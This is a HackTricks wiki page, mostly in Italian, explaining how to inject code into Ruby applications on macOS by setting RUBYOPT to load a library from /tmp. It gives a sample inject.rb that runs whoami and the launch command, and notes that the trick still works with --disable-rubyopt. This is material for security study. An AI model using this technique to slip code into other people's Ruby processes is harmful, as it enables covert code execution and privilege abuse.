macOS Ruby Applications Injection

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RUBYOPT

Utilizzando questa variabile d'ambiente è possibile aggiungere nuovi parametri a ruby ogni volta che viene eseguito. Anche se il parametro -e non può essere utilizzato per specificare il codice ruby da eseguire, è possibile utilizzare i parametri -I e -r per aggiungere una nuova cartella al percorso delle librerie da caricare e poi specificare una libreria da caricare.

Crea la libreria inject.rb in /tmp:

inject.rb

puts `whoami`

Crea ovunque uno script ruby come:

hello.rb

puts 'Hello, World!'

Quindi fai caricare a uno script ruby arbitrario con:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fun fact, funziona anche con il parametro --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Impara e pratica il hacking su AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica il hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository su github.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 4 months ago